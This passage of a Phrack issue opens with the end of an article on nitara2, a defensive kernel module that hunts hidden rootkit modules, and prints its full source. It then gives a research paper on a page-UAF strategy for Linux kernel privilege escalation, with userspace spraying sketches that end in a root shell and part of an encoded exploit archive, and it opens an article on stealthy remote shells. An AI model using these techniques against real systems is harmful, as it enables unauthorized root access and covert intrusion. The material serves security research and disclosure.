module's code, but what I wanted to copycat was module_hunter by madsys, so
forget it :D
2.3 Other challenges in adopting _that_ extrem way
--------------------------------------------------
Based on what has changed over the years, we will need to solve a few
problems to implement a newer tool (or rather a PoC?) for finding stray LKM
descriptors. Problems like:
- Fix broken kernel API. As the code of module_hunter is actually very
small, and the only API used was for procfs, it didn't take long to
find a way to export a proc file to communicate with the kernel module.
- Choose new fields of struct module that are the most appropriate for
detecting a stray struct.
- Memory management on x86_64 differs from that of i386, so the code that
checks for the page's presence needs to be fully reimplemented, more on
that below.
- Kernel virtual memory layout on x86_64 is also totally different from
that of i386. For instance, the kernel part of the virtual memory
space on x86_64 is huge compared to the vmalloc area of its 32-bit
predecessor, where struct modules were allocated back then (that is,
128 TB vs.
128 MB).
Since the modules region is way larger on x86_64, more checks are
needed to eliminate false positives on garbage remnants in memory.
With enough time and persistence, we at least get repaid with new cool
knowledge, so let's go!
3 The rebirth
=============
3.1 Detecting a stray struct module
-----------------------------------
After playing with the current struct module fields, I decided to
introduce more checks on memory contents than just validating a
module's name, which alone proved insufficient for the x86_64 module
memory area (more on this in 3.2). The checks are:
- The state field has one of the sane values: MODULE_STATE_LIVE,
MODULE_STATE_COMING, MODULE_STATE_GOING, MODULE_STATE_UNFORMED;
- The init and exit fields either point into the module mapping space of
x86_64 or are NULL;
- At least one of the init, exit, next and prev fields is not NULL;
each either points into the module mapping area or is a canonical
address (e.g. the list pointers);
- core_layout.size is not 0 and is a multiple of PAGE_SIZE.
This list may vary in the future, especially if I catch some more
sophisticated LKM. The checks may become more flexible, but they work
quite well for a PoC.
3.2 On virtual memory of x86_64 architecture
--------------------------------------------
Now that we've determined fields of interest, we need to know where to
start and finish testing for struct module similarity. Otherwise it would
be quite tough to bruteforce the whole almost-64-bit virtual address space.
In the virtual memory layout of modern x86_64 Linux, there is a dedicated
module mapping space [7], with a size of 1520 MB, for both 48- and 57-bit
virtual addresses. The start address is designated with a macro
MODULES_VADDR and the end address is represented by a MODULES_END macro.
After some more playing, I found out that the module mapping space is
where both module binaries and their descriptors get allocated. This is just
fine, as going through many terabytes of the vast virtual address space
was my biggest concern in terms of execution time.
3.3 Paging levels while solving the 'problem of unmapped'
---------------------------------------------------------
NOTE: If you're not quite familiar with the paging mechanism, refer to
e.g. the OSDev wiki [8], the Linux documentation [9], or your
processor's manual.
Well, now we are facing the same problem as the one noted in the
original paper:
``By far, maybe you think: umm, it's very easy to use brute force to list
those evil modules". But it is not true because of an important
reason: it is possible that the address which you are accessing is
unmapped, thus it can cause a paging fault and the kernel would report:
"Unable to handle kernel paging request at virtual address". ''
This would be resolved automatically when using __module_address(), but we
cannot afford it, so we need to check for page presence ourselves. To do
that, we need to go through tables that contain info about relations of
virtual and physical pages for a process. The kernel space part is the
same for each process because it maps to the same physical pages.
To support more physical memory, more page table levels were added in
64-bit x86; there can now be 4 or 5 of them, depending on both hardware
and kernel support. For each paging level, the PDE/PTE being dereferenced
must be checked for presence in RAM by using one of the following macros:
- pgd_present();
- p4d_present() (if 5-level paging is used or emulated);
- pud_present();
- pmd_present();
- pte_present().
Without getting too deep into the MMU guts, the check for the top level,
using currently available kernel macros and functions would look like this:
----snip----
struct mm_struct *mm = current->mm;
----snip----
pgd = pgd_offset(mm, addr);
if (!pgd || pgd_none(*pgd) || !pgd_present(*pgd) )
return false;
----snip----
You may find this check a bit paranoid and, especially looking at
similar in-kernel functions, maybe it's okay to remove pgd_none(). But
when I'm writing kernel C for a subsystem I am not quite familiar with,
I'd much rather be safe than sorry :D
There was a function called kern_addr_valid() performing similar checks,
but it was removed from the kernel a year ago [10]. dump_pagetable(),
spurious_kernel_fault(), mm_find_pmd() and some others also do that.
As for the varying number of paging levels, we could find out the proper
number with either CONFIG_PGTABLE_LEVELS or CONFIG_X86_5LEVEL. The first
one seems better if I (or anyone else) decide to port it to some other
architecture.
Support for 5-level paging was introduced in 2017 with versions 4.11-4.12
[11, 12]. Interestingly, with CONFIG_PGTABLE_LEVELS=5 the kernel wouldn't
break on 4-level hardware [13]:
``In this case additional page table level - p4d - will be folded at
runtime.''
4 Other architectures and outro
===============================
The only thing that prevents us from getting the code to work on
architectures other than x86_64 is (obviously) architecture-dependent
stuff. The virtual address spaces of other architectures (e.g. AArch64)
are different, not only in layout and size, but also in the possible
number of paging levels, which may vary from 2 to 4 depending on the
page size and the number of virtual address bits [14].
Notably, the code did compile for AArch64 running the 6.1.21 kernel,
until I added a check for CONFIG_X86_64. Due to memory management
differences, it of course did not report anything found.
As for kernel version compatibility, I've tested the code on 4.4, 5.14,
5.15 and 6.5 x86_64 kernels. It still may fail on some intermediate or
newer versions, most likely somewhere in the page table dereferencing
code. Feel free to let me know if that happens.
Once all the hardware incompatibility issues are properly taken into
account, I believe it's possible to run the tool on other architectures
as well. Hopefully I can add support for at least AArch64 once I'm ready
to dive into its memory management. PRs and suggestions (see [15]) are
also welcome! :^)
5 References
============
1. http://phrack.org/issues/61/3.html#article
2. http://phrack.org/archives/issues/50/5.txt
3. https://github.com/carloslack/KoviD
4. https://github.com/volatilityfoundation/volatility/wiki/Linux-Command-
Reference#linux_check_modules
5. https://github.com/linuxthor/rkspotter
6. https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.4.118
7. https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt
8. https://wiki.osdev.org/Paging
9. https://www.kernel.org/doc/html/v6.5/mm/page_tables.html
10. https://lore.kernel.org/lkml/Y05fQrd4TYaOnks%2F@infradead.org/
11. https://github.com/torvalds/linux/commit/b8504058a06bd19286c8b59539eebfda69d1ecb5
12. https://lwn.net/Articles/716324/
13. https://www.kernel.org/doc/html/v5.9/x86/x86_64/5level-paging.html#enabling-5-level-paging
14. https://www.kernel.org/doc/html/v6.5/arch/arm64/memory.html
15. https://github.com/ksen-lin/nitara2
6 The code (cleared a bit for the paper)
========================================
-----BEGIN NITARA2.C-----
/*
* original idea: madsys, "Finding hidden kernel modules (the extrem way)"
* http://phrack.org/issues/61/3.html
*
* usage: cat /proc/nitara2 && dmesg
*/
/* NOTE: the original include file names were lost in publishing;
 * the set below is a plausible reconstruction. */
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/proc_fs.h>
#include <linux/fs.h>
#include <linux/list.h>
#include <linux/mm.h>
#if LINUX_VERSION_CODE >= KERNEL_VERSION(6, 5, 0)
# include <linux/pgtable.h>
#elif LINUX_VERSION_CODE >= KERNEL_VERSION(5, 8, 0)
# include <linux/pgtable.h>
#elif LINUX_VERSION_CODE >= KERNEL_VERSION(4, 11, 0)
# include <asm/pgtable.h>
#else /* < 4.11 */
# include <asm/pgtable.h>
#endif
#include <linux/sched.h>
#include <linux/mm_types.h>
#include <linux/huge_mm.h>
#include <linux/uaccess.h>
#include <linux/slab.h>
#ifndef CONFIG_X86_64
# error "arch not supported :("
#endif
#define NITARA_PRINTK(fmt, args...) \
printk("%s: " fmt, module_name(THIS_MODULE), ##args)
#define NITARA_MODSIZE (0x1000 * PAGE_SIZE)
#ifndef sizeof_field
#define sizeof_field(TYPE, MEMBER) sizeof((((TYPE *)0)->MEMBER))
#endif
/* NOTE: arch-specific, we don't handle it yet */
#ifndef __canonical_address
static __always_inline u64 __canonical_address(u64 vaddr, u8 vaddr_bits)
{
return ((s64)vaddr << (64 - vaddr_bits)) >> (64 - vaddr_bits);
}
#endif
#ifndef __is_canonical_address
static __always_inline u64 __is_canonical_address(u64 vaddr, u8 vaddr_bits)
{
return __canonical_address(vaddr, vaddr_bits) == vaddr;
}
#endif
#define is_canonical_48(p) __is_canonical_address((unsigned long)p, 48)
#define is_canonical_or_zero(p) (p == NULL || is_canonical_48(p))
#define is_canonical_high_or_zero(p) \
(p == NULL || ((unsigned long)p >= VMALLOC_START && is_canonical_48(p)))
#if LINUX_VERSION_CODE >= KERNEL_VERSION(6, 4, 0)
#define MODSIZE(p) \
(p->mem[MOD_TEXT].size \
+ p->mem[MOD_INIT_TEXT].size \
+ p->mem[MOD_INIT_DATA].size \
+ p->mem[MOD_INIT_RODATA].size \
+ p->mem[MOD_RO_AFTER_INIT].size \
+ p->mem[MOD_RODATA].size \
+ p->mem[MOD_DATA].size)
#else
# define MODSIZE(p) (p->core_layout.size)
#endif
/*
* https://stackoverflow.com/questions/11134813/
* https://stackoverflow.com/questions/66593710/
* https://lwn.net/Articles/716324/
*/
static bool valid_addr(unsigned long addr, size_t size)
{
pgd_t *pgd;
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 11, 0)
p4d_t *p4d;
#endif
pmd_t *pmd;
pud_t *pud;
pte_t *pte;
struct mm_struct *mm = current->mm;
unsigned long end_addr;
pgd = pgd_offset(mm, addr);
if (unlikely(!pgd) || unlikely(pgd_none(*pgd)) || unlikely(!pgd_present(*pgd)) )
return false;
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 11, 0)
p4d = p4d_offset(pgd, addr);
if (unlikely(!p4d) || unlikely(p4d_none(*p4d)) || unlikely(!p4d_present(*p4d)) )
return false;
pud = pud_offset(p4d, addr);
#else
pud = pud_offset(pgd, addr);
#endif
if (unlikely(!pud) || unlikely(pud_none(*pud)) || unlikely(!pud_present(*pud)))
return false;
pmd = pmd_offset(pud, addr);
if (unlikely(!pmd) || unlikely(pmd_none(*pmd)) || unlikely(!pmd_present(*pmd)))
return false;
if (pmd_trans_huge(*pmd)) {
end_addr = (((addr >> PMD_SHIFT) + 1) << PMD_SHIFT) - 1;
goto end;
}
// NOTE: pte_offset_map() is unusable out-of-tree on >=6.5.
// As pte_offset_kernel() seems to work, use it instead :D
pte = pte_offset_kernel(pmd, addr);
if (unlikely(!pte) || unlikely(!pte_present(*pte)))
return false;
end_addr = (((addr >> PAGE_SHIFT) + 1) << PAGE_SHIFT) - 1;
end:
if (end_addr >= addr + size - 1)
return true;
return valid_addr(end_addr + 1, size - (end_addr - addr + 1));
}
static bool is_within_modules(void *p)
{
return (unsigned long)p >= MODULES_VADDR && (unsigned long)p < MODULES_END;
}
__maybe_unused static bool is_within_modules_or_zero(void *p)
{
return p == NULL || is_within_modules(p);
}
static bool check_name_valid(char *s)
{
size_t i;
if (!s)
return false;
for (i = 0; i < sizeof_field(struct module, name); i += 1) {
/* we might fail here if the name is "" */
if (s[i] == '\0' && i != 0)
break;
if (s[i] < 0x20 || s[i] > 0x7e)
return false;
}
return true;
}
ssize_t showmodule_read(
struct file *unused_file,
char *buffer, size_t len,
loff_t *off
) {
struct module *p;
unsigned long i;
NITARA_PRINTK("address module size\n");
for (
i = 0, p = (struct module *)MODULES_VADDR;
p <= (struct module*)(MODULES_END - 0x10);
p = ((struct module*)((unsigned long)p + 0x10)), i += 1
) {
if (
valid_addr((unsigned long)p, sizeof(struct module))
&& p->state >= MODULE_STATE_LIVE
&& p->state <= MODULE_STATE_UNFORMED
&& check_name_valid(p->name)
// may be unset for modules that can also be compiled in-kernel
&& is_within_modules_or_zero(p->init)
&& is_within_modules_or_zero(p->exit)
&& (p->init || p->exit || p->list.next || p->list.prev)
// https://elixir.bootlin.com/linux/v5.19/source/include/linux/list.h#L146
&& (is_canonical_high_or_zero(p->list.next) || p->list.next == LIST_POISON1)
&& (is_canonical_high_or_zero(p->list.prev) || p->list.prev == LIST_POISON2)
&& MODSIZE(p) && (MODSIZE(p) % PAGE_SIZE == 0)
) {
NITARA_PRINTK("0x%lx: %20s %u\n", (unsigned long)p, p->name, MODSIZE(p));
}
}
NITARA_PRINTK("end check (total gone %lu steps)\n", i);
return 0;
}
#if LINUX_VERSION_CODE > KERNEL_VERSION(5, 5, 19)
static struct proc_ops nitara2_ops = {
.proc_read = showmodule_read,
.proc_lseek = default_llseek, // otherwise segfaults
};
#else
// include/linux/fs.h#L1692
static struct file_operations nitara2_ops = {
.read = showmodule_read,
.llseek = default_llseek,
};
#endif
struct proc_dir_entry *entry;
int init_module()
{
NITARA_PRINTK("[creating proc entry]\n");
entry = proc_create_data("nitara2", S_IRUSR, NULL, &nitara2_ops, NULL);
return 0;
}
void cleanup_module()
{
NITARA_PRINTK("[cleanup proc]\n");
proc_remove(entry);
}
MODULE_LICENSE("GPL");
MODULE_AUTHOR("ksen-lin hotmail[.]com>");
-----END NITARA2.C-----
|=[ EOF ]=---------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0D of 0x11
|=-----------------------------------------------------------------------=|
|=-------------=[ A novel page-UAF exploit strategy for ]=-------------=|
|=-------------=[ privilege escalation in Linux systems. ]=-------------=|
|=-----------------------------------------------------------------------=|
|=---------=[ Jinmeng Zhou, Jiayi Hu, Wenbo Shen, Zhiyun Qian ]=---------=|
|=-----------------------------------------------------------------------=|
0 - Introduction
1 - Exploitation background
1.0 - Object-level UAF
1.1 - Previous page-level UAF in cross-cache attacks
2 - General idea
3 - Page-UAF exploitation steps
3.0 - Page-level UAF construction
3.1 - Critical object corruption through page-level UAF
4 - Evaluation results
4.0 - Bridge objects
4.1 - Real-World Exploitation Experiments
4.2 - Comparison of our page-UAF with previous methods
5 - References
-- 0 - Introduction
Many critical heap objects are allocated in dedicated slab caches in the
Linux kernel. Corrupting such objects requires unreliable cross-cache
corruption methods [1][2][3][4], due to the unstable page-level fengshui.
To overcome this, we propose a novel page-UAF-based exploit strategy to
overwrite critical heap objects located in dedicated slab caches.
This method can achieve local privilege escalation without requiring any
pre-existing infoleak primitive (i.e., no need to bypass KASLR); it can
help derive the infoleak primitive and arbitrary write primitive.
We developed 8 end-to-end exploits (https://github.com/Lotuhu/Page-UAF)
by using our page-UAF technique.
-- 1 - Exploitation background
-- 1.0 - Object-level UAF
The standard exploitation of object-level UAF leverages the invalid use of
a freed heap object (vulnerable object) via a dangling pointer. This use
can corrupt another object (target object) that takes the place of the
freed slot. For instance, to hijack control flow, we can corrupt a
function pointer within the target objects using the target value obtained
from a pre-existing information leakage primitive. The object-level UAF
exploitation requires the target object to reuse the freed slot
(previously the vulnerable object). Thus, the vulnerable object and the
target object must be allocated in the same slab cache (typically in
standard caches, e.g., kmalloc-192) and require object-level heap fengshui
to manipulate the memory layout. Dirtycred utilizes a critical-object-UAF
to achieve privilege escalation, using cred and file objects [4].
-- 1.1 - Previous page-level heap fengshui in cross-cache attacks
Nowadays, many critical target objects are allocated in the dedicated
caches (e.g., cred), rendering simple object-level heap fengshui
ineffective. To corrupt these objects, we have to launch cross-cache
attacks that usually rely on page-level heap fengshui [1][2][6]. The
page-level heap fengshui of OOB and UAF are different.
For OOB bugs, typically, an attacker would trigger overflows onto a
subsequent page [1][2]. For instance, after saturating a page (referred
to as "page 1") with many vulnerable objects, the attacker can allocate
target objects to make the slab cache request the following page (referred
to as "page 2"). Consequently, the last vulnerable object on page 1
becomes adjacent to the first target object on page 2, facilitating
overflow from the former to the latter. We can't make sure that the
vulnerable object is the last object on page 1 due to protections such as
CONFIG_SLAB_FREELIST_RANDOM. This page-level heap fengshui requires the
manipulation of page allocation in the buddy system, making the exploits
more unstable.
For UAF bugs, a common strategy is to convert an object-level UAF into
a page-level UAF. Specifically, the idea is to release many vulnerable
objects (one or more of which are freed illegally with dangling pointers)
to force the entire page to be freed. After that, allocate many target
objects so that the same page will be repurposed for the objects'
dedicated slab cache. Finally, the dangling pointer can be used to
overwrite the target object in another cache by page-level UAF.
-- 2 - General idea
Our idea is to induce page-level UAF by causing the free() of specialized
objects (we term them "bridge objects") that correspond to memory pages.
A bridge object is of a type that contains a pointer to the struct page
and is located in standard slab caches. Among others, struct pipe_buffer
is such an example with a field named page (and located in kmalloc-192).
We list the code snippet below:
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
Freeing such bridge objects will automatically cause the corresponding 4KB
page to be freed, effectively leading to a page-level UAF primitive. This
is because an object of type struct page (which by itself is 64 bytes in
recent Linux kernels) is used to manage a 4KB physical page in the kernel.
Through such a bridge object, an attacker can read/write the entire 4KB
memory, which can be reclaimed for other objects (including those stored
in dedicated slab caches, e.g., struct cred). This is because the freed
pages can be returned to the buddy allocator for future slab allocations.
Finally, attackers can overwrite the critical objects in such slabs to
achieve privilege escalation (e.g., setting the uid in cred to 0).
A prior work [3] also attempted to corrupt a page pointer (in pipe_buffer)
to construct page-UAF and achieve privilege escalation. Our technique
further defines and generalizes such a page-UAF technique. We will discuss
more differences in detail in Section 4.2, after introducing our exploit
technique.
-- 3 - Exploitation steps
The page-UAF exploit strategy consists of two main steps: page-level UAF
construction and critical object corruption, as discussed in the following.
-- 3.0 - Page-level UAF (Use After Free) construction
Starting from a memory corruption bug that provides an invalid write of
memory, e.g., OOB, UAF, or double free, we can first spray multiple bridge
objects (at least two) that co-locate with the vulnerable object.
Specifically, for bugs with standard OOB or UAF write primitives, we can
use the write primitive to corrupt the page pointer field in a bridge
object (e.g., the first field of pipe_buffer) such that it points to
another 64-byte page object nearby. This effectively causes two pointers
to point to the same object. A user-space program can trigger free_pages()
on one of the objects (e.g., by calling close()), which will create a
dangling pointer to the freed page object and the corresponding physical
page. In other words, we can read/write the corresponding physical page
that is now considered freed by the OS kernel. For example, one can write
to a pipe, which will lead to a write of the physical page via the
pipe_buffer object.
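As a hedged userspace sketch (our own illustration; the names and spray
count are hypothetical, not taken from the original exploits), spraying
pipe_buffer arrays looks like this:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define NR_PIPES 256 /* hypothetical spray count */

int main(void)
{
    static int fds[NR_PIPES][2];

    for (int i = 0; i < NR_PIPES; i++) {
        if (pipe(fds[i]) < 0) {
            perror("pipe");
            exit(1);
        }
        /* the first write allocates a physical page; its struct page
         * pointer is stored in the first pipe_buffer of the ring */
        if (write(fds[i][1], "A", 1) != 1) {
            perror("write");
            exit(1);
        }
    }

    /* ... trigger the OOB/UAF write to corrupt a page pointer here,
     * then close one pipe end to free the page while another
     * pipe_buffer still references it ... */
    pause();
    return 0;
}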
For bugs that have double-free primitives, which can often be achieved
from UAF by triggering the free() operation twice, we do the following.
For the first free, we spray a harmless object (e.g., msg_msg) to take
the freed slot. The object should take attacker-controlled values from
the user space. Then, we trigger the kernel code to write the harmless
object until reaching a certain offset, using the FUSE technique [5] to
stop the writing right before a planned offset - corresponding to the
page pointer field of a planned bridge object. Now, we trigger the free
for a second time to spray the planned bridge object to take the slot.
The writing process is restarted to continue overwriting the lower bits
of the page pointer field, which leads to a page UAF. Previously, to
trigger page-level frees from double frees, one had to release an entire
slab and then do a cross-cache technique [1][2], whereas no such
requirement is needed in our exploit method.
For standard OOB and UAF bugs, we use the following figures to better
demonstrate the memory layout at the various exploitation steps.
To start, we have at least two bridge objects (pipe_buffer1 and
pipe_buffer2) that contain a field of type struct page. The pointers
point to two adjacent page objects that correspond to two continuous
4KB physical pages. Below is the memory layout before triggering the
OOB/UAF corruption:
page * page *
----------[---+---------------][---+---------------]----------
[ * | pipe_buffer1 ][ * | pipe_buffer2 ]
slab cache[ * | ][ * | ]
[ * | ][ * | ]
----------[-+-+---------------][-+-+---------------]----------
| |
+---------+ |
| |
v v
-----------------[---------][---------]-----------------------
[ page1 ][ page2 ]
page pool [ ][ ]
[ ][ ]
-----------------[----+----][----+----]-----------------------
| |
| +------------+
| |
v v
----------+-----------------------+-----------------------+---
physical | 4KB page1 | 4KB page2 |
page | | |
| | |
----------+-----------------------+-----------------------+---
Now, we corrupt the page pointer within pipe_buffer1 to cause it to point
to page2 - this can be achieved by overwriting the lower bits of the
pointer field, similar to what DirtyCred requires [4]. This makes the
pointers in both pipe_buffer1 and pipe_buffer2 point to the same page
object (as shown below). At this point, we can release the page2 object
(along with its corresponding 4KB physical page) through the pointer in
pipe_buffer1. As a result, the page pointer within pipe_buffer2 becomes
a dangling pointer pointing to the freed page. The memory layout after
triggering corruption is shown in the figure below:
page * page * (dangling pointer)
----------[---+---------------][---+---------------]----------
[ * | pipe_buffer1 ][ * | pipe_buffer2 ]
slab cache[ * | ][ * | ]
[ * | ][ * | ]
----------[-+-+---------------][-+-+---------------]----------
| release |
+------------------+ |
| |
v v
-----------------[---------][---------]-----------------------
[ page1 ][..page2..]
page pool [ ][.........]
[ ][.........]
-----------------[----+----][----+----]-----------------------
| |
| +------------+
| |
v v
----------+-----------------------+-----------------------+---
physical | 4KB page1 |......4KB page2........|
page | |.......................|
| |.......................|
----------+-----------------------+-----------------------+---
-- 3.1 - Critical object corruption through page-level UAF
Now that we have a freed physical page and a dangling pointer that can
read/write it, it is fairly easy to allocate and corrupt critical heap
objects. This is because the critical heap objects are eventually
allocated through the buddy allocator at the page granularity.
attackers can spray the heap objects into the freed page as long as they
have already exhausted all existing slab caches. For example, we can
overwrite the cred object through the dangling pointer, as shown in the
following figure:
page * page * (dangling pointer)
----------[---+---------------][---+---------------]----------
[ * | pipe_buffer1 ][ * | pipe_buffer2 ]
slab cache[ * | ][ * | ]
[ * | ][ * | ]
----------[-+-+---------------][-+-+---------------]----------
| |
+------------------+ |
| |
v v
-----------------[---------][---------]-----------------------
[ page1 ][ page2 ]
page pool [ ][ ]
[ ][ ]
-----------------[----+----][----+----]-----------------------
| |
| +------------+
| |
v v
----------+-----------------------+[------][------]-------+---
physical | 4KB page1 |[ cred ][ cred ] |
page | |[ ][ ] ... |
| |[ ][ ] |
----------+-----------------------+[------][------]-------+---
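To make this last step concrete, here is a hedged userspace sketch
(ours, not the authors' exploit code; NR_CHILDREN is a hypothetical
spray count) of spraying cred objects and detecting a successful
overwrite:

#include <stdlib.h>
#include <unistd.h>

#define NR_CHILDREN 512 /* hypothetical spray count */

int main(void)
{
    /* each fork() makes the kernel allocate a fresh struct cred,
     * helping fill the page freed by the page-level UAF */
    for (int i = 0; i < NR_CHILDREN; i++) {
        if (fork() == 0) {
            while (getuid() != 0)      /* poll until the overwrite hits */
                usleep(100 * 1000);
            execl("/bin/sh", "sh", (char *)NULL); /* root shell */
            exit(1);
        }
    }

    /* ... perform the dangling-pointer write that zeroes a uid here ... */
    pause();
    return 0;
}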
-- 4 - Evaluation results
We analyzed the bridge objects in the Linux kernel v5.14. We took a sample
of 26 recent Linux kernel CVEs that are either OOB, UAF, or double-free
from 2020 to 2023. This includes 24 vulnerabilities from prior work [4],
and 2 additional OOB ones missed by the prior work.
-- 4.0 - Bridge objects
We found many objects containing page pointers, which reside in various
standard slab caches of different sizes. The Linux kernel has interfaces
to read/write the physical pages through the page pointers, such as
copy_page_from_iter and copy_page_to_iter (iter usually represents a user
buffer). We list the bridge objects, each followed by the slab cache
used to allocate it:
address_space->i_pages (radix_tree_node_cachep)
configfs_buffer->page (kmalloc-128)
pipe_buffer->page (variable size)
st_buffer->reserved_pages (variable size)
bio_vec->bv_page (variable size)
wait_page_queue->page (variable size)
xfrm_state->xfrag->page (kmalloc-1k)
pipe_inode_info->tmp_page (kmalloc-192)
lbuf->l_page (kmalloc-128)
skb_shared_info->frags->bv_page (variable size)
orangefs_bufmap_desc->page_array (variable size)
pgv->buffer (variable size)
We denote as "variable size" those objects whose sizes can differ at
runtime due to different allocation paths. Some objects, such as
pipe_buffer, are allocated as variable-size arrays from the standard
kmalloc caches, which makes them applicable to many bugs causing memory
corruption in the standard caches (e.g., kmalloc-192).
In addition, certain functions, such as process_vm_rw_core(), store
page pointers in a heap-allocated page array, which can also be used
with the page-UAF strategy.
-- 4.1 - Real-World Exploitation Experiments
We confirmed that 18 out of the 26 CVEs we examined are exploitable
using our proposed technique, by manually analyzing each CVE's
capabilities. Due to time constraints, we developed 8 end-to-end
exploits for 4 of those CVEs (open source at
https://github.com/Lotuhu/Page-UAF). The 8 remaining CVEs are not
suitable because they are not general to heap objects and can only
reach certain objects in specific subsystems, e.g., the eBPF subsystem.
Specifically, we developed 8 end-to-end exploits against CVE-2023-5345,
CVE-2022-0995, CVE-2022-0185, and CVE-2021-22555. The exploits spray
bridge objects to construct page UAF; we specifically target
pipe_buffer->page, configfs_buffer->page, and pgv->buffer. These exploits
are generally easier and more stable because there is no need for
infoleaks, cross-cache attacks, or page-level fengshui.
One exploit against CVE-2023-5345 uses another bridge object, i.e.,
configfs_buffer, which also has a field pointing to a newly allocated page.
This object is a little different from pipe_buffer; it has a field with
type char *, but it points to the first byte of a newly allocated physical
page.
Specifically, `buffer->page = (char *)__get_free_pages(GFP_KERNEL, 0);`.
After making a page-UAF by corrupting the lower bits, we can read/write
the whole physical page's content by triggering `copy_to_iter` and
`copy_from_iter` in the functions `configfs_read_iter` and
`configfs_write_iter`:
struct configfs_buffer {
size_t count;
loff_t pos;
char * page;
...
}
-- 4.2 - Comparison of our page-UAF method with previous methods
As we can see, our page-UAF exploit strategy can achieve privilege
escalation without requiring infoleaks to bypass KASLR. Additionally, it
offers the capability to leak information via the reading of physical page
memory. It can also help derive arbitrary write primitives via writing to
objects that have pointers in the physical page. Overall, the exploit
strategy reduces the memory layout manipulation requirements to
object-level heap fengshui - only the initial fengshui is required to
derive the page-level UAF.
To our knowledge, we have yet to see widespread use of bridge objects to
achieve page-level UAF in real-world exploits. The only example we are
aware of is a CTF competition [3] that uses the struct pipe_buffer as a
bridge object. There are several differences.
First, we made the observation that page-UAF is not limited to the
pipe_buffer object. Instead, any object containing a page pointer can
be a useful object to spray and corrupt, i.e., a bridge object. In
fact, pipe_buffer has been isolated into a dedicated slab called
"kmalloc-cg" since Linux kernel v5.14, and will require a cross-cache
exploit technique to operate in the future.
Second, our work analyzes many potential bridge objects that have a field
that manages one/multiple physical pages, and further finds feasible paths
to copy the user buffer from/to the physical pages. Therefore, we make the
generalized page-UAF technique more usable and future-proof.
Third, we simplified the exploitation process significantly compared to
[3]: the prior work triggered the page-pointer write twice to construct
the two-level nested page-UAF primitive, which we show is unnecessary and
achieves a lower overall success rate (75% as reported).
Our exploit requires only one page-UAF and simply sprays critical objects
into the freed page for corruption, achieving a 90%-100% success rate.
For example, we spray the pipe_buffer objects and corrupt one of the
"flags" fields, which can write a read-only file (/etc/passwd) to achieve
privilege escalation.
Exploits using our page-UAF strategy are relatively stable due to the
information-leak primitive they provide and the avoidance of page-level
heap fengshui. We ran five end-to-end exploits for the vulnerabilities
CVE-2022-0995 and CVE-2022-0185. Each exploit was run 10 times, achieving
a 90%-100% success rate without any crashes. This is attributed to the
fact that the exploits have a built-in feedback mechanism (i.e., read of
the physical page) that helps make sure the final write is performed on
the right target. Using this feedback mechanism, we can restart the
page-level UAF if the expected target is not detected.
-- 5 - References
[1] CVE-2022-27666: Exploit esp6 modules in Linux kernel.
https://etenal.me/archives/1825
[2] Reviving Exploits Against Cred Structs - Six Byte Cross Cache Overflow
to Leakless Data-Oriented Kernel Pwnage.
https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html
[3] [D^3CTF 2023] d3kcache: From null-byte cross-cache overflow to infinite
arbitrary read & write in physical memory space.
https://github.com/arttnba3/D3CTF2023_d3kcache
[4] Zhenpeng Lin, Yuhang Wu, and Xinyu Xing. 2022. Dirtycred: escalating
privilege in Linux kernel. In Proceedings of the 2021 ACM SIGSAC Conference
on Computer and Communications Security
[5] FUSE for Linux exploitation 101.
https://exploiter.dev/blog/2022/FUSE-exploit.html.
[6] Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup
https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606
-- 6 - Source Code
begin 700 Page-UAF.tar.xz
/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4gf/QlxdACgYSOZrHn6LH5JKqOuBL1u0yI8jn3l/4YJfAe
FeddxXmWnllck5WVQbNDCRReRqZ90IwlrMf2MrJzKrBXZRqgdPYinbpAHXJ2xSyp
=====================================================
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0E of 0x11
|=-----------------------------------------------------------------------=|
|=-------=[ Stealth Shell: A Fully Virtualized Attack Toolchain ]=-------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ Ryan Petrich (rpetrich@gmail.com) ]=----------------=|
|=-----------------------------------------------------------------------=|
Have you dreamed of a remote shell with the stealth of a custom in-memory
implant and the comfort of a shell running on your local host? Dream no
more, comrade – enjoy this exhaustive discussion of such a tool.
Introduction
~~~~~~~~~~~~
Attackers consider remote shells a foundational element of the attack
development lifecycle because they allow us to carry out operations on a
victim machine. Yet, the "market" for remote shell implementations is
rather stale and stagnant, with vendors offering proprietary tools and
everyone else building custom ones or binding standard in/out/error to a
remote socket before execing the system shell.
Traditional post-exploitation toolchains are either noisy and flexible,
or stealthy and cumbersome. But stealthy remote code execution need not
be unwieldy and slow to operationalize. By rethinking what the "remote"
in remote shell means, we can make shelling into exploited systems much
more difficult to detect.
This paper scrutinizes the remote shell status quo, describes a new class
of shell to simplify target puppetry, and traverses the syscall hells
along the way.
What is a remote interactive shell?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
An interactive shell is a prompt that accepts textual commands as input
from a user and acknowledges the output to the user. Prior to the
popularization of graphical interfaces, shells were the primary mechanism
for users to interact with their computers and still are for many people
of software. Those of us old enough to use DOS may remember the
C:\> prompt fondly, and those older than I may remember earlier ones.
Choice of shell is often personal to those who interact with computers
over extended periods, and experienced hackers customize their shells
with custom prompts, aliases, and scripts.
A *remote* interactive shell performs our commands over a network on
another computer instead of the one we're physically interacting with.
SSH is the canonical tool for legitimate remote interactive shells.
A classic approach is to write an exploit that creates a new socket,
connects to a predefined network address (where we're already listening),
then binds that new socket to standard input and output. After we bind it,
we exec the system's shell interpreter – replacing the service we
exploited (like nginx) with a shell under our control. We call this a
"connectback" shell because the exploit connects back to us.
Alternatively, we could reuse an existing socket (rather than creating a
new socket); we can choose the same socket we used to exploit the target
to maximize our convenience. With this approach, we write our exploit to
bind standard input and output to the existing network socket and exec the
system's shell interpreter. This is creatively known as a "socket reuse"
shell.
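The socket reuse variant swaps the socket creation for a hunt through
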